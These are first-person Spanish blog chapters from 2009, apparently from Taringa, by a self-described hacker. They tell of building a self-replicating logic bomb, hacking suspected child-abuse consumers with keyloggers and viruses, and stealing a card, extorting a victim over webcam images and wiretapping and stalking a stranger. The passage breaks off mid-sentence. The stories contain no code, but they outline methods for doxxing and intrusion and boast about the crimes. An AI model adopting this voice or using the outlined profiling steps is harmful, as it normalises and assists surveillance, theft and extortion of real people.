arrogante... Moco Coco 2009 Pd: Otra vez me paro la policía, me dijo: Que haces? A lo que respondí, arreglo el teléfono de mi casa, dijeron “ah ok” y se fueron mientras yo robaba el cable de telecentro.... -----------------------------------Inicio Chivo descarado----------------------------------------------------- Escritores malditos en taringa! Una comunidad que pretende orientar, compartir, guiar y conjeturar temas referidos a la creación de novelas o cualquier tipo de historia. http://www.taringa.net/comunidades/escritoresmalditos/ Invitados todos! (Sip, misma imagen que antes...) -----------------------------------Fin Chivo descarado-----------------------------------------------------

50
10
Moco Coco; Experiencias Hacker: Capitulo Nueve: Da Bomb!
Moco Coco; Experiencias Hacker: Capitulo Nueve: Da Bomb!
InfoporAnónimo7/21/2009

Experiencias: Capitulo Nueve: Da Bomb! Los virus en si nunca son una gran cosa. El que escribe virus, según mi experiencia, lo hace por dos o tres motivos: El primero fundamental es el dinero, en alguna oportunidad ya les e contado las cosas que mis ojos vieron en la facultad y como pagué todo el primer año con dinero basado en supuestos. Otra razón fundamental es el ocio, es impresionante las cosas que la gente hace o descubre cuando esta ociosa y ningún entretenimiento normal les resulta atractivos. Yo tengo una teoría sobre esta ultima, Notaron que la gente de Antes era más inteligente? No era tan raro oír o leer sobre gente que sabia cuatro o cinco idiomas, o que había científicos que además de este cargo ostentaban títulos en filosofía y letras, matemáticas, química, reparación de equipos de aire acondicionado o incluso el mismisimo y extraño arte de la porcelana fría. Pues bien, según veo yo, todos tenían un rasgo en común, estaban al pedo. Y la televisión o bien no era suficientemente atractiva o no existiría hasta siglos después. Hablar con la familia, digamos, tampoco era muy divertido, y no existía ni Tinelli ni la revista Paparazzi. Por eso, de aburridos, lo único que hacían era comerse toneladas de libros y libros y libros. Por eso sabían tanto. Bien volviendo al tema, otra razón para la creación de virus es sencillamente el alma de trascender. Muchos (en realidad los más antiguos en estas artes que yo conocí) querían o buscaban que sus creaciones se extendieran hasta el infinito. Mientras más lejos llegaban, más lindo se sentían. Yo eh visto la satisfacción en el rostro de algún VMaker cuando les decías: ahh sí! El c++h0rong0! Si lo conozco! Es insoportable! Lo vi en la revista PC LUsers! Pero en lo que a mí respecta, mi ocio programático siempre estuvo un poco mas orientado a los exploits. Desde la primera vez que escuché de estos y no sabían bien que eran, me pareció increíble que una porción de código permitiese hacer que hasta el mas inadaptado de los newbies en minutos pudiese lograr lo que un elite en horas. Obviamente como la gran mayoría comencé bajando estos programitas locos encontrados en diversas paginas o foros. Recuerdo que era muy contradictorio porque cuando comenzaron a popularizarse estos amigos yo me iba a un ciber, los bajaba, pero no los podía probar porque la mayoría corrían bajo unix o linux. Así que o bien me bajaba algún intérprete, o bien me los llevaba a las maquinas a las que accedían y tenían linux pero no internet. Luego vinieron las particiones en los ciber. En cada ciber o locutorio de Mataderos había (y debe haber) alguna que otra maquinita que perdió hace mucho un par de gigas ocultando mis particiones de linux y unix. A las particiones algo complicadas de realizar (dependiendo la cara de boludo del encargado de turno) le sucedieron los LiveCd como el bien amado Knoopix del cual usaba mayormente la consola y bajaba de un disco virtual en internet mis herramientas porque el cd no las tenia. Luego finalmente llegaron las virtualizaciones y las pendrive de 2 gigas donde uno trabajar puede cómodo y sin tener que emular los ciber puestos (esto son, para el que no los conozca, los programas que se usan para gestionar en la mayoría de casos los cibers, algunos son muy buenos, y otros una chantada mas Argentina.) Las virtualizaciones son muy cómodas, un linux muy liviano o tocado para serlo puede ser el mayor de los placeres para un hacker ambulante. Los exploit consumían la mayor cantidad de mi tiempo, nunca me limité solo a verlos desde ya. A medida que crecía y ampliaba mi saber iba tratando de crearlos yo, o sino de modificar los que ya existían para sortear tal o cual bache que estaba ya solucionado pero aun era explotable. El virus me resulta pesado, aparte tenes cien mil damnificados por un acto mero de arrogancia, mientras que con un exploit, solo molestás a una centena  Ahora bien, existen aparte de estas ramas algo que siempre me llamo la atención y me llevan a los que les quiero contar: Las bombas lógicas. Las bombas lógicas son, aun hoy, para mi como el recuerdo de la primera novia que en realidad quisimos, como el sabor de un chocolate en invierno cuando estas con alguien a quien queres y con el frió las mejillas se te ponen rojas rojas y te reís mucho. Las bombas lógicas son un placer programático, son divertidas e ingeniosas. Pero hubo una vez donde me enoje un pichitito con ellas. Fue algo muy feo. El verano de 2003 me encontró comenzando la universidad y todo era muy nuevo y asustante. Por alguna ridícula y vulgar razón yo no quería seguir haciendo hacking, pero si programación y afines. Todavía no había comenzado mi carrera como VMaker pago (perdón por usar ese titulo, es meramente ilustrativo, no tengo la inteligencia de los VMaker´s) y el hachear (como lo corrige mi word 2000) (si perdón! Odio el Open Office, perdoooon!) me estaba comenzando a abrumar un poco con la aparición en mi vida de los Pen Tester que solía odiar-amar-odiar-amar. Entonces apareció ella. La mas sexy de todas las Bombas lógicas que en mi vida tuve. Nació en el baño (nunca se cuestionen el origen de ciertas cosas si?) mientras hacia lo propio del baño (me estaba bañando de hecho) y mientas me un día en el agua hirviendo sentí que podía realizar una bomba realmente interesante. Fue así, se me ocurrió hacer una bomba multiplataforma explotable desde una pagina web con php, una especie de Remote File Injection pero mas severa. Como la idea era que fuese multiplataforma no me quise adherir a ningún Sistema Operativo por ende, no había ningún archivo en común que podía inyectar cómodamente, así que si no existe un archivo, vamos a crearlo! Tenia dos vulnerabilidades que no habían salido a la luz, una para archivos *.rtf y otra para explotar desde el php. De hecho la segunda sigue funcionando y la tengo guardada, capaz hago que vea la luz en estos días. Lo cierto fue, que en aquel momento se me ocurrió combinar ambas y armar algo medio loco. Así nació mi Bomba Lógica Nº 5, sucesora de otras cuatro satánicas creaciones que habrán dado mas una tarde de domingo con algún dolor de eggs realmente feo para mis victimas. La bomba estaba escrita en java pero era simplemente una prueba, un test como quien le dice a las cosas que quisieron ser definitivas pero no salieron. El problema es que en aquellos tiempos los disquetes era el soporte mas difundido (y si se lo preguntan, si, comencé yo también cuando se pinchaban los disquetes) y mis victimas eran muy abiertas. La creación me llevó mas de una semana, mucho mas, casi dos considerando las veces que esta que me dañó los discos o se me exploto en la cara de tux. Mi idea original era lograr generar y escribir desde una pagina web un archivo rtf en la raíz del disco victima o de ultima en las carpetas temporales. Luego el contenido de rtf seria explotado mediante el mismo exploit y finalmente lograr ejecutar código arbitrario desde el mismo disco informando su raíz estructura y si era un windows, su estado, enviando los resultados mediante un form a un servidor atacado mío. Todo este lindo paquetito transmitido mediante un mail a varias diversas victimas a modo prueba. El objetivo era grande, pues esto podría implicar muchísimos problemas a mas de uno (ok ok, los voy a enumerar. Si puedo escribir un rtf, puedo hacer lo mismo con un virus, un spyware, un keylogger, otra bomba, un salvapantalla o un copiarle un Corel Draw 13 portable que se inicie con windows)(y hay que ser hijo de puta para esto ultimo)(así también si puedo ejecutar arbitrariamente algún comando en vez de hacer una especie de ls o dir (para que se entienda) y mandar el resultado, podría formatear, encriptar, quemar, fundir y hasta soldar el disco) (lo de soldar es mentira) (Maldito Trastorno Obsesivo Compulsivo, no puedo dejar de poner paréntesis). Bien, el temita es otro hermanos, el problema es que así como Dios dijese a Adam “chabon, crece y multiplícate eh loco” mi archivo rtf solía tener algún que otro problemita, como por ejemplo, copiarse una y otra y otra y otra vez sobre el mismo espacio asignado hasta hacer que buffer se emputeciera tanto que arrastraba errores por todos lados, o peor aun, como mi programa tenia una función que reconocía si el archivo existía y si así era, renombraba la copia con el mismo nombre +%1 muchas veces me topaba con la módica suma de 8000000000000000000 copias del mismo archivo, lo cual era una molestia que no quería ocasionar, mi intención no era hacer tanto daño al pedo, quería ver si mi bebe funcaba... El problema fue tan domestico que me da vergüenza... lo subí desde el ciber La Guarida al ftp. Todo bien, me dije, que mejor método de ocultación! Pero ahhhhhhhhhh pobre de mi, ¿Sabría yo que DJJO-C (mi encargado-cliente-victima favorita) iba a entrar en la web? ¿Sabría yo entonces que DJJO-C fue una victima de la copia mortal del archivo? ¿Sabría yo que el no me vinculo a mi con esa creación y que le aviso a dueño del ciber? ¿Sabría yo que el dueño del ciber era hijo de policías? ¿Sabría yo que los policías eran de la división de delitos informáticos? ¿Sabría yo que los policías investigarían bien el código? ¿Sabría yo que los mismo policías dieron a conocer el código a algunas las comunidades hackers extranjeras difundiendo la mentira de que este se encargaba de llevar virus informáticos a hospitales en Buenos Aires? ¿Sabría yo que comenzaría una cacería sobre el creador? O que la policía vendió el exploit? O que la policía aun lo sigue usando? O que jamás me perdone por haberlo creado? Si, algo de eso debí sospechar, pero era muy raro que eso sucediese. Alguien conoce la teoría del Caos? El efecto mariposa? El mismo a grandes rasgos define que un hecho ínfimo puede alterar a grandes pasos el curso de otros gigantescos. Una sucesión infinita que tiene lugar en cualquier ámbito o momento, y sirve no mas que para ver la finiquitud del ser humano que no puede prever tantas variables para llegar a un resultado concreto. (Recomiendo leer sobre el origen de dicha teoría pues es mas que interesante como se relaciona con la informática moderna) Pues bien, eso tuvo lugar. Claro, yo no comprendí hasta mucho después las implicancias de un hecho tan insignificante como el mío. Estos capítulos no son mas que un compendio de glorias y de miserias personales. Y en mi vida abundaron esas glorias y esas miserias en todos los ámbitos. Pero lo que no me deja realmente dormir tranquilo es el pensar que por algo que yo hice para perder el tiempo, mas de una persona habrá pasado un muy mal momento. La informática es efímera, se debe entender esto, es simplísimo, es efímera porque no existe nada seguro, casi por definición, es efímera porque no existen soportes indañables o inalterables o perdurables siquiera, no al acceso publico. No existe la posibilidad de la trascendencia supratemporaria pues todo muere a partir de la evolución constante, y conforme pase el tiempo, esto se ira agravando, pues este mar evolutivo no da tiempo ni deja estandarizar nada. Cuanto tiempo tarda un standar en volverse tal? Recuerden siempre a los vhs, a los cd, a los dvd... el standar estará próximo concluir y es por la vorágine informativa y mediática, nada mas resta. Y puede claro que me equivoque, puede que nunca mueran y los standar perduren no en manos de quien no puede adquirir nada mejor. Cuanto tarda en degradarse un papel en circunstancias habituales? Cuanto tarda en degradarse un cd o un dvd? Bien, eh aquí la única verdad, ningún sistema es seguro, y jamás habrá de serlo, por todo esto la informática es efímera, y quien confía en ella al cien por cien es merecedor de grandes dolores muy a lo futuro. Por eso un daño informático también puede serlo si no tiene implicancias en el mundo real. jamás cree un software que te borre una foto de tu novia muerta que no imprimiste. La culpa es tuya por no hacerlo. Pero de ahí a que mi soft se use para enviar preso a alguien o extorsionarlo.. eso no pude perdonármelo. Que loco, hice una bomba que al final me explotó en mi inconsciente. If there is no pain, rules has turn the same, im with you, just leave me, im ready to play. Tnt 4 da brain. (Tnt For the Brain. Enigma. Le roi est mort, vive lo roi!, 1996) Moco Coco 2009 -----------------------------------Inicio Chivo descarado----------------------------------------------------- Escritores malditos en taringa! Una comunidad que pretende orientar, compartir, guiar y conjeturar temas referidos a la creación de novelas o cualquier tipo de historia. Invitados todos! (Sip, misma imagen que antes...) -----------------------------------Fin Chivo descarado-----------------------------------------------------

35
0
M
Moco Coco; Experiencias Capitulo 12: PedoHunter.
InfoporAnónimo7/28/2009

Experiencias capitulo 12: PedoHunter. Bien, es hora de ponernos mas serios, tengo que si o si hablar de este tema. Por complicado que resulte es necesario contar las cosas que uno sabe. Cuando comencé a escribir esto pensé que no iba a tocarlo pero ahora es necesario ya que abrirme a contar lo que me paso en mi vida hacker concierne también a este capitulo. La pedofilia es el mas aberrante de los delitos para la sociedad y también lo es para mi por razones muy similares a los expuestos por cualquier mediático corriente. Es raro, yo puedo reírme de la ignorancia, pero no así de la inocencia. Esta ultima me parece una plusvalía humana que es considerablemente mayor a cualquier calamidad que persona alguna viva jamás. Definiendo ambos conceptos a la edad de catorce años entendí que siempre que hablé de inocencia me referí al no saber y de ignorancia al no querer saber. Ese es el mayor de los beneficios de ser chico, tenes inocencia. Y como tratar a aquel que la roba por arrogancia ? En el fondo el pedofilo también tiene algún tipo de inocencia pero de ahí a verlo bellos dios... que lejos estamos... En fin. Hubo cierta ocasión donde algo en mi realmente me asusto, porque realmente me descoloque. Fue así, un día de hace muchos años seguramente en sábado a la noche, yo había ido a un ciber con mi bien amado amigo Sergio Morales para bajarme de Internet alguna que otra novedad súper hacker que me acapararía toda la noche entre sollozos y café. Pero una repentina desconexión desemboco en que comenzara a revisar carpetas de usuarios. El Ciber en cuestión quedaba en Flores, al lado de una casa de videos juegos en donde tras pelearme con Sergio para no entrar en esta ultima habíamos decidido tomar maquinas separadas para no interferir el uno con el otro. Tsunami (tal como se llamaba) tenia la disponibilidad de, por una módica suma de dinero, armar una carpeta con contraseña para guardar cosas que uno después grabaría en algún cd de fácil ralladura. Mi desconexión de internet me llevo a que comenzara minuciosamente a revisar todas y cada una de las carpetas en búsqueda de alguna forma de matar el tiempo. Entonces apareció un archivo rar que todavía recuerdo el nombre: Sorpresita.rar. Abrirlo y descomprimirlo no era muy común en mi, porque si lo hacia con cada uno de los rar me pasaría horas, pero aparentemente este en particular contenía videos, tal vez porno corriente o uno de esos videos estupidos. Así fue como los vi, por primera y única vez en mi vida vi eso. Fue raro, me dolió. Lo primero que sentí fue eso, dolor. Saben que pasa? Es que yo siempre había visto a la pornografía infantil como algo que tal vez no existiría, como un invento de los medios, pero al saber que era cierto, que eso pasaba en algún punto del mundo a alguien, que existía un ser humano vejado por una mierda de persona enferma me hizo mal, terriblemente mal. No voy a describir el video, no se ilusionen, pero fue tan fuerte, me impacto mal que tuve que cerrar eso y me puse a llorar. Tenia yo 18 años y me hizo realmente mal, no podía imaginar que horrible dolor era el que pasaban y pasarían esas nenas, incluso cuando ya fueran mayores, estaba asistiendo yo a como se traumaba una cabeza, era malo, realmente malo eso, mas de lo que podía soportar. Como antes dije, esperaba que eso no existiese, no quería creer que lo q había visto era cierto. Me callé, no le dije nada a Sergio, saben porque no dije nada? Tenia miedo que quisiera verlo el con sus ojos porque no me creería y finalmente tendría yo que volver a verlo. Me daño de una forma que no entiendo, no podía ser cierto eso, entiendan algo, esas cosas siempre fueron un mito urbano, hoy por hoy es facil, pero entonces casi imposible que un usuario normal lo encuentre. Después en el viaje de vuelta le conté porque sabia que el no corroboraría nada mas por que no le interesaba que porque no pudiera romper el frágil pass de windows. Esa noche dormí mal, no por sueños raros, sino porque me sentí en la responsabilidad de hacer algo. Trate de pensar practico, en aquel entonces no existía mucha información sobre redes p2p, de hecho había muy pocos programas en mercado. Asi que de alguno de ellos debían salir esos videos. Ares, SoulSeek, Kazaa o algún similar tipo GNUTELLA debía albergar información. Pero no me podía imaginar que hacer, porque lo único que se me ocurría era bajar los videos yo y luego castigar a los que hacían eso, pero en el fondo, no era contribuir un poco a su distribución? Porque por mas que los bajara para borrarlos, los programas que sacan índices de lo que se baja marcarían que dicha temática albergaría un adepto, aunque mi anima fuera netamente vengativa. Entonces me decidí a volverme un cazador de pedofilos. Definamos los términos, un pedofilo es para el UnderHack Argento alguien que baja esa información, ya sean fotos o videos o relatos o dibujos en la onda (si, detesto también los lolicon) y un pedofilico se refiriere al que lo produce. Mi idea era cazar a estos últimos pero para llegar a ellos debía si o si comenzar con los primeros. Pero mi juicio se nublaba y al cabo de ponerme a ver las fuentes disponibles (encima a desgano por los motivos antes mencionados) terminaba hackeando a todos y buscando alguna información que me sirviera para un escrache publico a esos hijos de puta. Entonces comenzaron a aparecer en mi vida foros hackers que antes no había visto. LHA (un brazo en realidad de la LHA o Legión Hacker Argentina), ChildProtect y varios mas, y fue raro! yo buscaba foros hackers donde encontrar información general y estaba suscripto a todos o la gran mayoría, pero apareció ante mi una cantidad enorme de gente que hacia hacking con el mismo fin que yo, cazar. Así fue como me volví un PedoHunter. Tras largas charlas sobre filosofía y moral, muy interesantes como para plasmarlas en gratitud acá, comenzamos a desarrollar planes estratégicos de hacking en contra de esa gente. Lo primero que se nos ocurrió fue buscar alguna ONG que nos diera información o se adhiriera a nuestra causa. Tras la negativa oficial (pero la afirmativa emocional donde en mas de una ocasión recibímos un “Gracias” muy sincero y oculto) decidimos investigar un poco. Así consideramos varios factores obvios. 1)Tenían que tener un código interno, porque sino como no se bajaban así nomás las cosas esas? 2)A la fuerza ellos moderarían el contenido. 3)Los pedofilos eran un nexo castigable pero que se debía conservar si queríamos llega a algún productor de esa basura. Por lo que al código interno se refiere era cierto, existen, hijos míos, toda una serie de términos que desembocan en todo tipo de material, hay palabras que no se pueden escribir con cierta regularidad y que abren esas puertas. El problema era conseguirlos sin infiltrarnos, así que decidimos hacer algo insospechado, replicaciones falsas! Bajamos de internet fotos de alguna mayor de edad agraciada y tras renombrarla y cambiarle los tags y toda la bola esperamos a que alguien baje desde el Kazaa. Resultado? Muy pocos lo habían hecho. Tras buscar sus ip y entrar en sus maquinas vimos que no tenían nada raro, así q los dejamos ir. Pero cuando todas las esperanzas parecían perdidas apareció uno, un verdadero pedofilo. Este tipo se contentaba bajando imágenes de todo tipo con nombres sugerentes referidos a seguramente este tipo de material. Así que comenzamos a sacar PrintScr de sus carpetas y archivos y a analizar los términos y nombres. Entonces obtuvimos una listita negra con varias palabras que de casualidad no se pueden escribir y que te llevan a eso. Perdonen que no escriba dichas palabras, es que prefiero no difundirlas mas a ver si termino haciendo mas mal que bien. El mio a hacer mal por inconciencia es un miedo muy intimo les confieso. Así comenzamos a desarrollar muchas cosas para nuestra obsesiva tarea. Éramos mas de quince hackers de unos 16-45 o mas años que nos dedicábamos a día y noche pensar en como seguir buscando mas y mas y mas y mas. Así armamos virus, bombas lógicas, keylogger exclusivos para capturar tecleos raros, modificamos sniffers, y hasta armamos un programa p2p sin mayor éxito pero que moderaba y filtraba cualquier contenido referente a la materia en cuestión. En menos de un mes, recuerdo que eran vacaciones, organizamos mas de 500 denuncias sobre esa gente, a veces publicas desde el anonimato que nos daba internet, otras veces privadas avisando a la policía que todo nos ignoraba. Mucha gente había confesado bajar ese tipo de cosas ante nuestro apriete informatico, idiotas que dejaban curriculums en el escritorio junto a fotos aberrantes de una vejación a una menor. Enfermos e idealistas estúpidos en algunos casos, otros mas fundados y temerosos, igualmente todos nos asqueaban y merecían nuestro odio mas profundo. Sobre lo que en mi pasaba se dividía de a ratos en distintos sentimientos, a veces me veía idealista, otras veces sádico pero socialmente justificado según creía y creo, algunas veces me sentía culpable porque disfrutaba el cazar pedofilos y no debía hacerlo pues alguien había sufrido la perdida de la inocencia y tal vez perdería la vida tratando de curar sus problemas... Era todo muy confuso, pero mas allá de cualquier cosa, un sentimiento nos llenaba a todos, la idea de que no estábamos haciendo nada. Esa gente no se iba a reformar, no se reforman, son trastornados, para que lo hacíamos entonces? O peor aun, esa gente era muy poco en comparación con los que arman esas mierdas, se entiende? Todo el trabajo que nos tomábamos era muy inútil si existía el productor de eso. Ya casi perdido los idealismos, a los dos meses de cacerías y escarches, de dolores de cabeza a muchos y cansancio hasta las lagrimas, decidí darme por vencido. Entonces algo paso. Una persona hablaba desde un chat de MIRC al respecto del tema. Tras indagar un poco este tipo decía tener material suyo exclusivo, que se lo había vendido un tipo de Italia al que ocasionalmente contactaba para recibir jpgs. Seguí indagando a medida que copiaba y pegaba la charla a ver que pistas podía conseguir, el se impacientaba tras la espera mía pero seria recompensado según dije, por un video de mi autoría que en realidad era una simple película de Chaplin bajada de internet. Así fue como tras añadirlo a un msn, tras infectarlo con alguno de mis virus, tras desactivar y sortear firewalls e instalar keyloggers encontré lo que buscaba. La dirección de un pedofilico. Inmediatamente reuní al grupo de la LHA para contar esto que vivía en tiempo real, todos enfermos como yo que no importaba la hora estaban conectados aunque en ausente mientras hacían cosas de ellos pero que abandonaron todo ante mi alerta. Comenzamos así una investigación sobre el productor. Era un italiano de unos treinta años que vivía en Parma, estaba casado y tenia dos hijos a los que seguramente trataría bien, una esposa de aspecto simpático y motivador. Una casa bien cara y sin deudas. El tipo se dedicaba vender casas por internet en zonas aledañas a la suya y trabajaba en sus ratos libres en voluntariados que horrorosamente tenían que ver con chicos carenciados de allá. El tipo se hacia llamar R@ygold2 y era un productor real de material pedofilico porque según averiguamos los audios de varias películas que yo no vi porque no quería acostumbrarme a que eso parezca normal era la misma voz que atendía las llamadas del los VoidIp desde que los llamábamos. Ahora bien, nosotros éramos el dark side, se entiende? A quien avisarle? Porque mandamos miles de mails a ONGS dedicadas y por burocracia no se metían, y mandamos miles de mails a las policías de todos lados pero nadie hacia nada, ni siquiera el FBI ni mucho menos CIA o alguno de esos porque al final era para quilombo. Hasta que un día nos cayo en la mano una dirección [email protected] Esa gente fue a la que contactamos. Y fue la única que respondió realmente. Nos mandaron un mail diciendo gracias. Al cabo de 6 semanas aparecía en portada de un diario de Capital Federal que había caído toda una red de pedofilia acá en Argentina con conexiones en Italia. Nada decía de nuestra intervención pero si sobre este hijo de puta del cual ahora se sabia todo y el repudio de la prensa era internacional. Habíamos vengado a una nena. Detalles sobre hasta un asesinato aparte. Esa fue una experiencia mas que viví, cazar pedofilos. Al finalizar esto el grupo se dividió entre los que protestaban porque no habían hecho ninguna mención a nuestro trabajo y los que decíamos que nos importaba un carajo porque lo importante estaba hecho. Luego solitario yo cazé muchos mas, y les destruí la vida a mucha gente por esos pecados, fui un vengador de inocencias por años y largos años. Creo que no me cansé de hacerlo, me harté de saber que todo lo que hacia yo era por la arrogancia de creer que podía cambiar el mundo cazando y advirtiendo que ahí estábamos. En el fondo lo mío era eso, una arrogancia mas de un idiota, por eso pare también con eso. Si, hice desastres en todos ellos, arruine mil vidas mas, arruine mil esperanzas culpables por arrogancia. Que extraña confesión, algún día quizás a mi también me cazen por este otro tipo de arrogancia, pero mientras sé que algo intente hacer y no me quede cómodo mirando tele pensando que nada de eso existe. Moco Coco 2009 Pd: si alguna vez advierten algo sobre este tipo de material, no envíen inmediatamente todo a la gente de INTERPOL porque se saturan y no hacen nada, traten de reunir información y por favor, no se bajen nada para hacer lo que yo, consulten antes a alguien que este en el tema, no a mi, yo quizás ya no este. -----------------------------------Inicio Chivo descarado----------------------------------------------------- Escritores malditos en taringa! Una comunidad que pretende orientar, compartir, guiar y conjeturar temas referidos a la creación de novelas o cualquier tipo de historia. http://www.taringa.net/comunidades/escritoresmalditos/ Invitados todos! (Sip, misma imagen que antes...) -----------------------------------Fin Chivo descarado-----------------------------------------------------

50
5
M
Moco Coco; Experiencias: Capitulo 13: Daños Colaterales
InfoporAnónimo7/28/2009

Experiencias: Capitulo 13: Daños Colaterales Taconeaba yo en la noche de Mataderos, era interesante oír mis zapatos con las suelas gastadas al punto de la madera, un golpeteo suave y militarizado. Me alegraba saber que no estaba solo puesto que ese ruido me acompañaba. El viento me vejaba atractivo y me seducía la idea. Sentía el pelo suelto volar a un costado de mi vista y parecían Ángeles negros custodiándome. -Hasta donde querés llegar hoy? Yo podía meterme en un mail, hackear la mayoría de paginas que se me ocurrian, meterme con los servicios públicos, hasta había logrado intervenir las líneas telefónicas de media ciudad de tres formas distintas. -Hasta donde querés llegar hoy? Pensaba en los daños colaterales, en mis victimas ocasionales e intencionales, mi lista se reducía a tres, mi vecina, la srita Silvia G. que vivía al lado de mi casa y cuya tarjeta de crédito fue sutil y futilmente robada desde el publico de la otra cuadra en el que compre casi 700 pesos de crédito en voidip que no serian gastados del todo puesto que cuando denunciase el robo la perdida máxima seria de 200 pesos, y así fue. -Hasta donde querés llegar hoy? podía intervenir teléfonos, contaba con medios suficientes para la paranoia absoluta, como lo hice con aquel infeliz al que odiaba por idiota y al que abriéndole la webCam PrintScrn y suerte mediante extorsioné sin pedir nada a cambio por las fotos de su “amigo” dicky felado por su novia, la perra maldita que calentaba braguetas por internet y se hacia la recatada compañera y alumna ejemplar de la Universidad de la Matanza, carrera Ingeniería en Informática, 2do año Ingresantes 2003 -Hasta donde querés llegar hoy? Lo único que me faltaba era poder intervenir celulares, la norma GSM todavía no se había impuesto, el BT estaba a siglos (de 2 años) de aparecer. Cambiar ESN, intervenirlos a poca distancia, cambiar datos o robar agendas o clonarlos o romperlos o denúncialos por falsos si podía, pero me faltaba intervenirlos. -Hasta donde querés llegar hoy? Y esa tarde lo había conseguido. Sin saber una pizca sería de hardware o electrónica lo había conseguido, podía intervenir líneas de celulares no gsm con solo una computadora y algunos segundos de practica y delay aprovechando la disponibilidad ajena de empresas que guardan secretos para gritarlos por mucha/poca plata. Me ate el pelo, me abrí el saco y deje que el viento me vejara ahora desganado y entregado a mi que todo lo podía. Entre en mi casa que no tenia llave y a las cuatro AM después de salir de La Guarida sonreí a un joven de 21 años que desde el espejo lucia unos anteojos redondos y me dijo –“Hasta donde querés llegar hoy?” a lo que finalmente respondí con dudas y certezas “hasta el final” para luego saciarme de mi hambre de comida y sueño de frío no frío. La mañana asoleada me encontró en una plaza, hoy me miro pasar en alguna vidriera tardía y todavía descubro que soy idéntico salvo por el pelo corto y la cara mas baqueteada. Como fuese, esa mañana enfundado en mi saco gris obscuro y pelo atado salvo en la parte delantera que estaba cortado como esas nenas rebeldes al desmechado observaba desde mis anteojos “tipo lenon” (según el vendedor de Once) a la gente que pasaba. Había llamado muy temprano a BlowFish del que ya les hablare miserias y grandezas para contarle mi plan, pero me detuve. Esto era cosa mía nada mas. A las 9 AM en una plaza que nunca supe el nombre y con un sol que rajaba la tierra por ser invierno me encontraba eligiendo victima. Y ahí se me presentó. Parte I FoodPrint Un joven, un rockero duro de pelo enmarañado y pocas responsabilidades, era toda una delicia. Seria tal como sospechaba un rebelde con causas pero empadronado y pagador de servicios públicos y privados, igualmente, si no lo era, tanto mejor porque seria un reto ver hasta donde llegaría con el. Lo seguí a pie, durante toda la mañana hasta que llegó el medio día y se adentró en un edificio que por lo pulcro contrastaba con su ropaje. Podría haber entrado en el, todavía no se usaban las tarjetas magnéticas y convencer al guardia de la entrada que yo era conocido me hubiese sido fácil, pero el “hack Físico” (Como diría mi Fernando Joaquín Suárez) no quería que fuese mi estilo. Esperé hasta la noche para hacer un poco de trashing, y de trashing real. Cuando a las 7 PM tras un día de descanso pues las vacaciones de invierno no concluían me habían dejado solo para hacer todas las cosas que yo siempre soñé me deje llevar hasta dicho lugar y robe todas las bolsas de basura hasta la esquina donde las custodié hasta que nadie (por lo tarde) se animara a pasar por ahí. Guantes en mano comencé a romper las bolsas mientras escondido e iluminado con una linterna de mano amable en baterías recargadas soñaba con encontrar algo. Varias toallitas y pañales atrás encontré un producto digno del rocker, una letra de una canción. “Algo de mi te debe quedar en tu vientre” dijo el rocker ante una hoja que luego tiro y reformulo en otra que yo tenia en mi poder entonces para conformar “algo de mi leche en ti quedo”. Un pañuelo sucio, varias cajillas de cigarrillos con miles de colillas, un desodorante marca axe y mil letras de canciones mas me dieron la pauta de que era un rocker total. Comencé entonces el FingerPrint. Intervine todos los teléfonos del edificio, esta vez de un modo también físico, estaría activo en aquellos días puesto que no era yo muy de hacer esas cosas, escuchaba durante varias horas al día desde la caja de mitad de cuadra mil y una conversaciones que me abrumaban, al principio no, al principio todo era divertido, me escuche las travesuras de una sirvienta media perrera, un flaco que hablando de perros los paseaba a dos cuadras, una familia que llamaba a un pariente día por medio y cuando lo lograban le relataban lo que un tal Nicolás hacia por teléfono en el colegio, y un muchacho que jodia con que las cervezas dañaban el espíritu cuando este estaba lastimado. Sin duda era el. Así que desde el teléfono le contaba lo que vivía desde que una chica había abortado su semilla desde la raíz arrancándole algo de su muerta inocencia. -Me duele hermano, me duele –decía y yo me repetía “y a mi que?” Con el teléfono en una mano y la guía negra en la otra comencé a investigar un poco mas. El teléfono estaba a nombre del padre, así también como un deposito que salía en el banco con domicilio ahí en el mismo edificio, es decir, el hombre vivía con el padre en el mismo lugar. El padre era un anciano jubilado de prilegio de la Legislatura porteña y mantenía a su hijo que nada hacia ni pagaba mas que unas bombachas que vendía algunos domingos en Plaza Italia por cinco pesos según dijo una vez a un compañero de aventuras por teléfono. Gozaba el hijo de Internet, cable Direc Tv, y hasta estaba suscripto a varias emisoras on line de afuera que cobraban por contenido. Para mi desgracia, la obviedad, el joven era un gordo masturbero viejo que vivía bajando porno y que jamás pagaría un diario, una revista, una película ni nada. Contaba con una buena computadora pero mejor aun era el equipo multimedia, una cámara excelente, una placa de audio aun mejor y apenas opacada por un equipo de 5 canales que harían las delicias hasta de Beethoven. -Hasta donde quiero llegar hoy? Para hacer un resumen, tenia yo intervenido su teléfono de línea de un modo físico e incomodo, su celular, el de sus padres y sus amigos, la computadora de punta a punta gracias a conseguir el ip por las múltiples paginas donde el vivía, su basura, en resumen, de a poquito podría armarme para conseguir su vida... Parte II Enum.exe Igualmente voy a enumerar los pasos por los que saque los datos para que se entienda mejor. Primero revolví su basura y de ahí saque la temática de sus canciones, luego intervine su teléfono de línea y al saber de que hablaba pude filtrar su numero. Gracias a las guías transversas saque el titular de ahí al RENAPER para averiguar quien era, deduje que era el padre por la edad y los datos vinculantes, con el nombre y dni vi las deudas desde las paginas del AFIP y lo que ahora se llama ARBA, gracias a que no figuraba en Pami pude averiguar que tenia una jubilación de privilegio por una afjp que luego se fundió cuando se armo mas quibombo, con los datos del padre tenia también los datos del hijo, de ahí saque bien el nombre y apellido, el dni, sus deudas y los pocos servicios que había tenido en su vida (a saber, una tarjeta de crédito hecha bosta, un auto viejo cuya deuda de patente lo asustaba ya que revisaba a diario y varias veces la pagina de automotores y salía corriendo apenas veía un numero, y varias compras por internet como una guitarra que según vi, vendió luego para no registrar en que gasto su dinero) Yo como un poseso observaba su webcam algún que otro día, bendito sea mi amigo Walter y su poca habilidad para arreglar notebooks, me la había dejado semanas y semanas junto con el GPS nuevo e inservible acá en Argentina. Y bendito los vecinos vacacioneros de al lado que me había dejado el cable bien bajito para que se lo pinchara de lo lindo.... Ahora bien, debía seguir investigando a mí victima, el joven aparentaba tener una vida social muy grande pero solo en fines de semana santos para él, durante el resto de días comía solo lo que compraba en el súper delante de la computadora y nada más. Ocasionalmente llamaba a su novia, la chica del aborto no espontáneo para insultarla y llorar, me encantaba escucharlo y al le encantaba gastar celular o que? No me explico aun hoy por que no usaría el teléfono de línea. comencé a jugar un poco mas... Parte III PortScanning. Comencé a llamarlo por teléfono jugando bromas bizarras. Una vez dije ser un amigo de la infancia con el 